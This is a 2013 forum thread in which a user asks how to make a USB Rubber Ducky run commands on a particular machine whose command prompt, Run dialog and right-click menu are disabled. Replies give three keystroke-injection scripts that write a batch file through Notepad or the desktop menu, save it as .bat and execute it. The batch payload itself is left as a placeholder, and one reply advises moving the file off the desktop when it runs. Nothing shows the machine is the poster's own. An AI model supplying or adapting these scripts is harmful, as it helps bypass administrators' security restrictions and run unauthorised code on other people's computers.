Narwhal990 Posted December 20, 2013 Share Posted December 20, 2013 Hi, I'm a bit stumped here. I have been thinking how I'm going to get the Ducky to run some commands on this specific machine but I'm not sure how. They disabled command prompt and win + r but allow batch scripts to be executed. They also disabled right click in explorer. Is there any way for the ducky to write to a file and then execute it? I feel as though this may have mitigated a ducky attack (hope not!)... Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 22, 2013 Share Posted December 22, 2013 (edited) I suppose you could bypass the command prompt, and do it the GUI way. Command prompt is my favorite though. You will need delays inserted into this script, I am not actually running the code, going through the key combos on my computer though. REM Select Desktop. GUI D REM Select menu/app key. APP REM Select 'new'. STRING W REM Select 'text document'. STRING T REM Type out the name of the text document. STRING BATCH_NAME REM Arrow over to the extension. RIGHTARROW REM Delete 'txt' extension. DELETE DELETE DELETE REM Replace extension. STRING bat ENTER REM Say yes to the prompt that asks us if we want to change the extension. STRING y REM Edit the file in notepad. APP STRING e *** INSERT BATCH FILE HERE *** *** MAKE SURE TO ADD SOME CODE TO BAT FILE TO MOVE THE FILE SOMEPLACE OTHER THAN THE DESKTOP ON RUN *** REM Save the file. CTRL S REM Close the batch file. ALT F4 REM Run the file. GUI D ENTER This works on Windows 7. Also, be aware that sometimes if a program has been launched before from the desktop it can mess up the icon selection when you go GUI D. There was a forum posting this week actually that brought this to my attention. This all kinda hinges on the MENU/APP key, so I don't know if it will work. You said they disabled right click? wouldn't that essentially brick the computer? Edited December 22, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 22, 2013 Share Posted December 22, 2013 (edited) This should be able to do it without any right click. Again, this is for Windows 7. GUI STRING notepad ENTER ALT f STRING a STRING %USERPROFILE%\Desktop\BATCH_NAME.bat ENTER REM In case of repeats. ALT y *** TYPE BATCH FILE HERE *** *** MAKE SURE TO ADD SOME CODE TO BAT FILE TO MOVE THE FILE SOMEPLACE OTHER THAN THE DESKTOP ON RUN *** REM Save the file. CTRL S REM Close the batch file. ALT F4 REM Run the file. GUI D ENTER You know, it would be hilarious if you were actually the admin of the network! Edited December 22, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 22, 2013 Share Posted December 22, 2013 (edited) This one has a little less repetition in the saving of the file. GUI STRING notepad ENTER *** TYPE BATCH FILE HERE *** *** MAKE SURE TO ADD SOME CODE TO BAT FILE TO MOVE THE FILE SOMEPLACE OTHER THAN THE DESKTOP ON RUN *** REM Save the file. ALT f STRING a STRING %USERPROFILE%\Desktop\BATCH_NAME.bat ENTER REM In case of repeats. ALT y REM Close the batch file. ALT F4 REM Run the file. GUI D STRING BATCH_NAME.bat ENTER Edited December 22, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.